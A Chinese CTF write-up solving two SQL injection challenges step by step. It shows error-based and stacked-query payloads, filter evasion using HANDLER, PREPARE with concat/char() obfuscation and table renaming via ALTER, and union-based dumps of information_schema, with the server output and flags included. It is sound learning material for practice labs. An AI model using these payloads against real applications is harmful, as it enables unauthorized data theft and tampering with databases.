2024/3/30 主站刷题

1.ez_sql

1.测试注入类型
回显 2-1不等于1,字符型

2.判断闭合方式

1‘看报错,得知单引号闭合

3.查列数

group by得2列

4.union select查询

select被过滤,绕过方法也失效,采用报错注入

http://210.30.97.133:28043/?inject=1'||extractvalue(1,concat('$',(database())))||'1'='1

1
error 1105 : Unknown XPATH variable at: '$supersqli'

拿表名

发现过滤了==.==号,还过滤了where,查资料发现可以堆叠注入

http://210.30.97.133:28043/?inject=1';show databases;#

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
array(1) {
  [0]=>
  string(11) "ctftraining"
}

array(1) {
  [0]=>
  string(18) "information_schema"
}

array(1) {
  [0]=>
  string(5) "mysql"
}

array(1) {
  [0]=>
  string(18) "performance_schema"
}

array(1) {
  [0]=>
  string(9) "supersqli"
}

array(1) {
  [0]=>
  string(4) "test"
}`

http://210.30.97.133:28043/?inject=1';show tables;#

1
2
3
4
5
6
7
8
9
array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

select被过滤

http://210.30.97.133:28043/?inject=1';show columns from words;# 没有flag

http://210.30.97.133:28085/?inject=1';show columns from `1919810931114514`;# ==反单引号括住==

1
2
3
4
5
6
7
8
9
10
11
12
13
14
array(6) {
  [0]=>
  string(4) "flag"
  [1]=>
  string(12) "varchar(100)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

?inject=1’;select flag from flag;# 会过滤select,到这没思路去看wp

方法一:MySQL中查询语句handler:

  1. handler 【表名】 open; // 打开某个表
  2. handler 【表名】 read first || next; // 读取表里第一行或者下一行的数据
  3. handler 【表名】 close; // 关闭该表
1
2
3
handler `1919810931114514` open;
handler `1919810931114514` read first;
handler `1919810931114514` close;

方法二:

  1. PREPARE 【自定义名】 FROM 【自定义的SQL查询语句】;//生成
  2. EXECUTE 【自定义名】;//执行
  3. DEALLOCATE PREPARE 【自定义名】;//释放

由于select被过滤,concat绕过

1
2
3
PREPARE Hack_SQL from concat('s','elect', ' * from `1919810931114514` ');
EXECUTE Hack_SQL;
DEALLOCATE PREPARE Hack_SQL;

或者ascii编码

1
2
3
PREPARE Hack_SQL from concat(char(115,101,108,101,99,116), ' * from `1919810931114514`');
EXECUTE Hack_SQL;
DEALLOCATE PREPARE Hack_SQL;#

方法三

由于前端提供查询的数据库为words,但是flag在数据库1919810931114514里。并且可以猜测后台的SQL查询语句为:select * from words where id=【你输入的id】

1.所以我们需要先将数据库words改成其它的数据库名
2.再把数据库1919810931114514改名为words
3.并且把(改名前)1919810931114514数据库的字段flag改名成id

payload

1
2
3
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(100);

改完之后输入?inject=1’ or 1=1; 显示flag

1
2
3
4
array(1) {
  [0]=>
  string(42) "flag{590b74d2-2d4d-41f7-bb0e-137622e5043b}"
}

参考文章 https://blog.csdn.net/weixin_44632787/article/details/118737571

SSSCTF2023-YUAN’S SQL

1
2
3
<?php
$sql = "SELECT * FROM jiuzhe WHERE id = ".'('.$_GET["id"].')';
$result = $conn->query($sql);

提示:闭合方式是(id)

发现注释符好像没有用,手动闭合

==?id=1) or (1=1== 给了个fake flag

1
Array ( [0] => Array ( [id] => 3 [username] => A306 [password] => where_is_flag ) [1] => Array ( [id] => 4 [username] => Fake_F1ag [password] => sssctf{f11lag_is_not_there_hahaha} ) )

试了试id=3,发现有回显,测试注入点

==?id=3)–+== Array ( [0] => Array ( [id] => 3 [username] => A306 [password] => where_is_flag ) )

?id=3) group by 4–+无回显,3有回显,3列

?id=3) union select 1,2,database()–+Array ( [id] => 1 [username] => 2 [password] => ==dutctf== )

?id=3) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’dutctf’–+

查表

Array ( [id] => 1[username] => 2 [password] => ==jiuzhe,users==) )

查列

?id=3) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=’dutctf’ and table_name=’users’–+

Array ( [id] => 1 [username] => 2 [password] => id,==username,password== )

查数据

?id=3) union select 1,2,group_concat(username,password) from users–+

Array ( [id] => 1 [username] => 2 [password] => scr1wOHHHHHHH,Flag==flag{c39ee9a1-5a6f-41c4-9789-909ab2d1ba1d}== )

学过了再来复现新生赛,很有成就感╰( ̄▽ ̄)╭